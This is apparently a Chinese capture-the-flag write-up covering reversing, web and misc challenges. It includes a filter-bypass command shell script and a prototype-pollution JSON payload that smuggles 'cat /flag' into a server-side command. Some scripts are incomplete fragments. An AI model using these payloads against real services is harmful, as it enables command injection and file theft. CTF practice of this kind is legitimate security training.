# [Re] Comeongo

name[:8] = GoM0bi13
passwd[:8] = G3tItEzF

b64Decode(X051YmNmRnE=)= _NubcfFq

abcdefghijklmnopqrstuvwxyz
mnopqrstuvwxybcdefghijklmn


name[:12] = GoM0bi13_Bin
passwd[:12] = G3tItEzForRe

name[12] a→0xD7 b→0xD8 c→0xD9 … z→0xF0 … A→0xB7
name[13] a→A9

name = GoM0bi13_BingGo@
passwd = G3tItEzForRe??0!


# [Re] unlambda

import re

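arr = []
# l(x) applies x to the S combinator and then to the K combinator; every other
# term in the challenge text is built by nesting calls to l.
l = lambda x : (x (lambda y : lambda a: lambda b : (y (b)) (a (b))))(lambda c : lambda __: c)

# Converts a Church numeral to a Python int by applying it to "+1" starting at 0.
I = lambda x : x(lambda _:_ + 1)(0)

# Characters a numeral expression may contain before it is handed to eval().
_NUMERAL_CHARS = set("Il()")

subed = ""
cnt = 0
with open('var.txt', 'r') as f:  # each line of var.txt holds the value of one check variable
    # NOTE(review): the listing never assigns `content`; reading the whole file
    # here is the assumed intent - confirm against the author's original script.
    content = f.read().strip()

c = 0
while c < len(content):
    if content[c] != "I":
        # Anything that is not the start of an I(...) call is copied through.
        subed += content[c]
        c += 1
    else:
        # Skip "I(" (assumes "I" is always followed by "(") and collect the
        # text up to the matching ")".
        c += 2
        stack = 1
        code = "I("
        while stack != 0:
            if c >= len(content):
                raise ValueError("unbalanced parentheses after 'I(' in var.txt")
            if content[c] == "(":
                stack += 1
            elif content[c] == ")":
                stack -= 1
            code += content[c]
            c += 1
        # SECURITY: var.txt comes from the challenge artifact and eval() runs
        # whatever it is given, so the expression is limited to I, l and
        # parentheses before it is evaluated.
        if not set(code) <= _NUMERAL_CHARS:
            raise ValueError(f"unexpected characters in numeral expression: {code!r}")
        result = eval(code)
        subed += f"arr[{str(result)}]"

# Give the long combinator term a readable name so the structure is visible.
subed = subed.replace("l(l(l(l(l))))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))))(l(l(l(l))))))(l(l(l(l(l))))))(l(l(l(l)))(l(l(l(l)))))","run")
print(subed)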


run(arr[6])(l(l(l(l)))(l(l)))(run(arr[24])(l(l(l(l)))(l(l)))(run(arr[30])(l(l(l(l)))(l(l)))(run(arr[37])(l(l(l(l)))(l(l)))(run(arr[16])(l(l(l(l)))(l(l)))(run(arr[41])(l(l(l(l)))(l(l)))(run(arr[10])(run(arr[47])(run(arr[0])(run(arr[38])(l(l(l(l)))(l(l)))(run(arr[7])(run(arr[23])(run(arr[27])(run(arr[40])(l(l(l(l)))(l(l)))(run(arr[57])(run(arr[31])(run(arr[9])(run(arr[12])(l(l(l(l)))(l(l)))(run(arr[28])(l(l(l(l)))(l(l)))(run(arr[46])(l(l(l(l)))(l(l)))(run(arr[59])(run(arr[61])(l(l(l(l)))(l(l)))(run(arr[22])(l(l(l(l)))(l(l)))(run(arr[35])(l(l(l(l)))(l(l)))(run(arr[56])(l(l(l(l)))(l(l)))(run(arr[39])(run(arr[19])(l(l(l(l)))(l(l)))(run(arr[3])(l(l(l(l)))(l(l)))(run(arr[51])(run(arr[63])(run(arr[60])(run(arr[52])(run(arr[29])(l(l(l(l)))(l(l)))(run(arr[62])(l(l(l(l)))(l(l)))(run(arr[13])(l(l(l(l)))(l(l)))(run(arr[34])(run(arr[1])(run(arr[50])(l(l(l(l)))(l(l)))(run(arr[21])(run(arr[11])(run(arr[25])(l(l(l(l)))(l(l)))(run(arr[42])(l(l(l(l)))(l(l)))(run(arr[32])(l(l(l(l)))(l(l)))(run(arr[14])(run(arr[8])(run(arr[58])(l(l(l(l)))(l(l)))(run(arr[5])(run(arr[53])(run(arr[17])(l(l(l(l)))(l(l)))(run(arr[18])(l(l(l(l)))(l(l)))(run(arr[33])(run(arr[15])(run(arr[2])(l(l(l(l)))(l(l)))(run(arr[55])(run(arr[45])(run(arr[26])(l(l(l(l)))(l(l)))(run(arr[4])(run(arr[36])(l(l(l(l)))(l(l)))(run(arr[49])(run(arr[54])(l(l(l(l)))(l(l)))(run(arr[20])(l(l(l(l)))(l(l)))(run(arr[44])(l(l(l(l)))(l(l)))(run(arr[43])(l(l(l(l)))(l(l)))(run(arr[48])(l(l(l(l))))(l(l(l(l)))(l(l))))))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))))(l(l(l(l)))(l(l))))))))(l(l(l(l)))(l(l)))))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))(l(l(l(l)))(l(
l))))(l(l(l(l)))(l(l))))(l(l(l(l)))(l(l)))))))))

l(l(l(l)))和F作用是一样的, l(l(l(l)))(l(l))和T的作用是一样的

exp:

import re
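arr = []
# l(x) applies x to the S combinator and then to the K combinator; every other
# term in the challenge text is built by nesting calls to l.
l = lambda x : (x (lambda y : lambda a: lambda b : (y (b)) (a (b))))(lambda c : lambda __: c)
# Converts a Church numeral to a Python int by applying it to "+1" starting at 0.
I = lambda x : x(lambda _:_ + 1)(0)
subed = ""

# Characters a numeral expression may contain before it is handed to eval().
_NUMERAL_CHARS = set("Il()")

# The two search patterns in the listing were garbled (runs of "$" where the
# escaped brackets and parentheses had been) and could not match anything.
# They are rebuilt here from the literal strings the script replaces below.
_ZERO_TAIL = "])(l(l(l(l))))(l(l(l(l)))(l(l)))"
_ONE_TAIL = "])(l(l(l(l)))(l(l)))(l(l(l(l))))"
_ZERO_PAT = re.compile(re.escape("run(arr[") + r"([0-9]*)" + re.escape(_ZERO_TAIL))
_ONE_PAT = re.compile(re.escape("run(arr[") + r"([0-9]*)" + re.escape(_ONE_TAIL))

with open('var.txt', 'r') as f:  # each line of var.txt holds the value of one check variable
    # NOTE(review): the listing never assigns `lines`; readlines() is the
    # assumed intent - confirm against the author's original script.
    lines = f.readlines()

for line in lines:
    content = line.strip()
    c = 0
    while c < len(content):
        if content[c] != "I":
            # Anything that is not the start of an I(...) call is copied through.
            subed += content[c]
            c += 1
        else:
            # Skip "I(" (assumes "I" is always followed by "(") and collect
            # the text up to the matching ")".
            c += 2
            stack = 1
            code = "I("
            while stack != 0:
                if c >= len(content):
                    raise ValueError("unbalanced parentheses after 'I(' in var.txt")
                if content[c] == "(":
                    stack += 1
                elif content[c] == ")":
                    stack -= 1
                code += content[c]
                c += 1
            # SECURITY: var.txt comes from the challenge artifact and eval()
            # runs whatever it is given, so the expression is limited to I, l
            # and parentheses before it is evaluated.
            if not set(code) <= _NUMERAL_CHARS:
                raise ValueError(f"unexpected characters in numeral expression: {code!r}")
            result = eval(code)
            subed += f"arr[{str(result)}]"
    subed = subed.replace("l(l(l(l(l))))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))(l(l(l(l)))(l(l(l(l(l))))))(l(l(l(l))))))(l(l(l(l(l))))))(l(l(l(l)))(l(l(l(l)))))","run")
    subed += "))))))"  # in case the parentheses end up unbalanced, append a few extra closers

    subArr = [0]*64

    # Collapse the innermost run(arr[i])(..)(..) term on each pass; which of
    # the two argument orders it has decides bit i.
    while "run" in subed:
        hit = _ZERO_PAT.search(subed)
        bit = 0
        if hit is None:
            hit = _ONE_PAT.search(subed)
            bit = 1
        if hit is None:
            # Without this the loop would fail with a bare IndexError.
            raise ValueError("no reducible run(arr[i]) term left in: " + subed[:80])
        index = int(hit.group(1))
        subed = subed.replace(hit.group(0), "l(l(l(l)))")
        subArr[index] = bit
    arr.extend(subArr)

# Each group of 8 bits is one character, least significant bit first.
flag = ""
for i in range(0, len(arr), 8):
    c = 0
    for k in range(8):
        c |= arr[i+k] << k
    flag += chr(c)
print(flag)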


# [Web] 没有人比我更懂py

shell.py

import requests
import re

# NOTE(review): the `def` line and the `for c in ...:` loop header that enclose
# this fragment are missing from the listing, so it does not run as shown.
# What remains builds `res` by replacing each alphabetic character with a
# backslash plus its octal code point and copying every other character as is,
# presumably to get past a filter on letters (the filter itself is not shown).
res = ""
if c.isalpha():
    res += "\\"+oct(ord(c))[2:]  # oct() returns "0o..."; [2:] drops that prefix
else:
    res += c
return res

# Interactive loop: read a line, POST to the challenge service, then print the
# text captured from the first matching <p> element of the response.
while True:
    cmd = str(input())
    url = "http://172.51.227.173/"
    # NOTE(review): `data` is never assigned in the listing; the line that
    # builds the form body from `cmd` is missing.
    x = requests.post(url=url, data=data)

    # re.S lets "." span newlines; [0] raises IndexError when nothing matches.
    res = re.findall(r'        <p>(.*)</p>', x.text,re.S)[0]
    print(res)


# [Web] WHOYOUARE

// Validation fragment from the challenge's server code; the enclosing function
// and loop are not shown. An entry is rejected when it is not a string, is
// longer than 4 characters, or matches the regex.
// NOTE(review): the first two tests read `cmd` but the regex test reads
// `command[i]` - presumably the same element; confirm against the full source.
// NOTE(review): as written `\$` matches a literal dollar sign; it may have
// been the `$` end anchor before the page was rendered - confirm.
if (typeof cmd !== 'string' || cmd.length > 4 ||RegExp(/^[^a-zA-Z0-9-]+\$/).test(command[i])) {
    return false;
}


exp.py

import json, requests

# Object sent to the challenge endpoint. The nested 'constructor' -> 'prototype'
# keys are a prototype-pollution vector: presumably the server merges this
# object recursively (the merge code is not shown), which would define
# property '2' on a shared prototype.
# Defensive takeaway: a recursive merge over client-supplied JSON should refuse
# the keys `__proto__`, `constructor` and `prototype`, and validation should
# cover inherited properties as well as own ones.
command = {
    'constructor': {
        'prototype': {
            '2': 'cat /flag'
        }
    },
    # Two entries only, so index 2 is not an own element of this list.
    'command': ['-c', '-c']
}

# The object is JSON-encoded into a string and sent as the "user" field.
cmd = {"user": json.dumps(command)}
# NOTE(review): `url` is never assigned in the listing; the line that sets the
# endpoint is missing.
res = requests.post(url=url, json=cmd)
res = res.json()
print(res)


# [Misc] babyMisc

from pwn import *

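def main():
    """Play one round of the number-guessing service by binary search.

    Opens a new connection, reads one line, sends ``Y``, reads two more lines,
    then guesses within 0..999999 until a reply contains neither "low" nor "up".

    Returns:
        A tuple ``(r, x)``: the still-open connection and the last reply as
        ``str(bytes)``. The caller checks ``x`` for "lost".
    """
    r = remote('172.51.227.55', 9999)

    lo = 0
    hi = 999999
    r.recvline()
    r.sendline(b"Y")
    r.recvline()
    r.recvline()
    while True:
        mid = (lo + hi) // 2
        # Send bytes explicitly rather than relying on implicit str conversion.
        r.sendline(str(mid).encode())
        x = str(r.recvline())
        if "low" in x:
            # Guess too low: exclude mid. Keeping mid in the range, as the
            # original did, stalls once hi == lo + 1 and never reaches hi.
            lo = mid + 1
        elif "up" in x:
            # Guess too high: exclude mid as well.
            hi = mid - 1
        else:
            print(mid)
            break
        print(f"{lo} {hi} {x}")
    return r, x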

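# Retry until a round ends with a reply that does not contain "lost".
x = "lost"
r = None
while "lost" in x:
    if r is not None:
        # Close the connection from the lost round before opening a new one,
        # so failed attempts do not leave sockets open.
        r.close()
    r, x = main()

# Hand the winning connection to the terminal.
r.interactive()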
